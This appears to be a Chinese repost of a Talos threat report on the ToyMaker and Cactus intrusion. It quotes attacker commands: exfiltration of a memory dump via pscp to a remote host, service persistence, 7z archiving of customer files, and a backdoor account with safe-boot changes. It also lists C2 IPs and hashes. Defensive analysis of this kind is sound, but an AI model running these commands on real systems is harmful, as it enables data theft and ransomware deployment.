在当今复杂多变的网络威胁环境中,攻击者之间的合作愈发频繁,形成了更具破坏性的攻击链。2023年,思科Talos团队揭露了一起针对关键基础设施企业的联合攻击事件,攻击者通过精心策划的多阶段入侵,从初始访问逐步演变为双重勒索。本文将详细分析这一攻击链的各个环节,揭示攻击者如何利用多种工具和策略逐步渗透目标网络,最终实现其恶意目的。
-
2023年,思科Talos团队发现一家关键基础设施企业遭受了广泛的入侵,入侵者是一个由多种威胁行为者组成的联合体。 -
从初始入侵到实施双重勒索,这些行为者通过结合使用各种具有双重用途的远程管理工具、SSH工具以及文件传输工具,缓慢而稳定地入侵了该企业网络中的众多主机。
-
初始访问代理(IAB)被Talos称为“ToyMaker”,Talos对其评估的可信度为中等,这是一个以经济利益为动机的威胁行为者,他们利用暴露在互联网上的易受攻击的系统进行入侵。他们部署了我们称之为“LAGTOY”的定制后门,并从受害企业中窃取凭据。LAGTOY可以用来创建反向shell并在受感染的终端上执行命令。
-
一旦被LAGTOY入侵,可能会导致访问权限被移交给第二个威胁行为者。具体来说,Talos团队观察到ToyMaker将访问权限移交给Cactus,这是一个双重勒索团伙,他们使用自己的战术、技术与程序(TTP)在受害者的网络中实施恶意行为。
Magnet RAM Capture是一个免费的取证工具,用于获取主机的内存转储,从中可以提取凭据。这种战术可能解释了Talos在此次活动中识别出的大量受感染系统的高数量。
然后使用7za.exe归档命令T1560对内存转储进行归档:
7za.exe a -p -mmt2 -mhe 1.7z 1.rpscp.exe -P 53 1.7z root@<Remote_IP>:/root一旦攻击者获得内存转储,他们就会再次使用sftp-server.exe连接下载并执行我们称之为“LAGTOY”的定制反向shell植入。
LAGTOY通过创建一个服务来在系统上持久化[T1543][7]:
sc create WmiPrvSV start=auto error=ignore binPath=C:Program FilesCommon FilesServicesWmiPrvSV.exe植入程序会联系其中配置的C2服务器,以接收在端点上执行的命令,例如:
图注:LAGTOY执行逻辑
LAGTOY旨在作为名为“WmiPrvSV”的服务在受感染的系统上运行。
C2 IP地址和协议端口均已硬编码到LAGTOY中。通信通过443端口使用原始套接字进行,而非像预期的那样在此TCP端口上使用TLS。
图注:指挥和控制通信
C2会向LAGTOY发送特定的管理代码:
-
#pt:停止服务。
-
#pd:中断当前执行链并检查服务是否已停止。如果已停止,则等待特定时间后重新连接到C2。
-
#ps:创建特定的进程/命令。
-
如果代码不以#开头,则直接在端点上执行提供的命令或进程名称。
图注:LAGTOY的命令识别逻辑
与2022年Mandiant发现的样本相比,此样本新增了#ps处理器,用于创建命令对应的进程。
图注:2022年的样本没有#ps参数
LAGTOY能够处理来自C2的三个命令,每个命令之间的休眠间隔为11000毫秒。在其信标周期内,它会记录上次C2通信和命令执行的成功时间。如果C2发出的命令至少连续30分钟失败,植入体将向C2发送一条消息,告知其命令执行失败。
LAGTOY嵌入了一个看门狗程序。如果它累计运行时间超过60分钟,它将停止执行命令,然后检查服务是否已停止。如果服务仍然处于活动状态,植入体将重新启动与C2的连接。
图注:LAGTOY的总体时间和C2通信逻辑
C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>
C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>C:Windowssystem32cmd.exe /c <path>7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>�001.7z <path>Private FolderCustomers<path> -p<password>
Cactus团伙在不同端点上使用了多种远程管理工具以维持长期访问。这些工具包括:
-
eHorus Agent:远程控制软件,也称为Pandora RC -
AnyDesk:远程桌面应用程序 -
Remote Utilities for Windows Admin (RMS Remote Admin):一款俄罗斯制造的远程管理工具/平台 -
OpenSSH:Windows操作系统中包含的SSH软件包
这些远程管理工具通过PowerShell和Impacket从攻击者控制的远程位置下载:
在另一个案例中,攻击者通过OpenSSH创建了反向shell,创建了一个计划任务,每小时连接到C2服务器以接收并执行命令:
net user whiteninja <password> /add
reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /v LegalNoticeText /t REG_SZ /d /f
reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v DefaultUserName /t REG_SZ /d whiteninja /f
reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v AutoLogonCount /t REG_DWORD /d 1 /f
bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0
图注:Metasploit shellcode与远程服务器通信
-
Cisco Secure Endpoint(原AMP for Endpoints):非常适合阻止本文中提到的恶意软件的执行。
-
Cisco Secure Email(原思科邮件安全):可以阻止威胁行为者在活动中发送的恶意邮件。
-
Cisco Secure Firewall(原Next-Generation Firewall和Firepower NGFW):例如Threat Defense Virtual、自适应安全设备和Meraki MX等设备可以检测与该威胁相关的恶意活动。
-
Cisco Secure Network/Cloud Analytics(Stealthwatch/Stealthwatch Cloud):自动分析网络流量,并提醒用户连接设备上可能不需要的活动。
-
Cisco Secure Malware Analytics(Threat Grid):识别恶意二进制文件,并将保护功能集成到所有思科安全产品中。
-
Cisco Secure Access:基于零信任原则构建的现代云交付安全服务边缘(SSE)。
-
Umbrella(思科安全互联网网关):阻止用户连接到恶意域名、IP和URL,无论用户是否在企业网络中。
-
Cisco Secure Web Appliance(原Web安全设备):自动阻止潜在危险站点,并在用户访问之前测试可疑站点。
-
防火墙管理中心:提供针对特定环境和威胁数据的额外保护。
-
Cisco Duo:为用户提供多因素身份验证,以确保只有授权用户才能访问网络。
-
Snort规则集:使用开放源代码的Snort订阅规则集的用户可以通过在Snort.org上购买最新规则包来保持更新。
fdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be38260a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867
0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb
5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d
691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3
70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de
a95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132
c1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6bToyMaker:
209[.]141[.]43[.]37
194[.]156[.]98[.]155
158[.]247[.]211[.]51
39[.]106[.]141[.]68
47[.]117[.]165[.]166
195[.]123[.]240[.]2
75[.]127[.]0[.]235
149[.]102[.]243[.]100Cactus:
206[.]188[.]196[.]20
51[.]81[.]42[.]234
178[.]175[.]134[.]52
162[.]33[.]177[.]56
64[.]52[.]80[.]252
162[.]33[.]178[.]196
103[.]199[.]16[.]92 
原文始发于微信公众号(山石网科安全技术研究院):ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论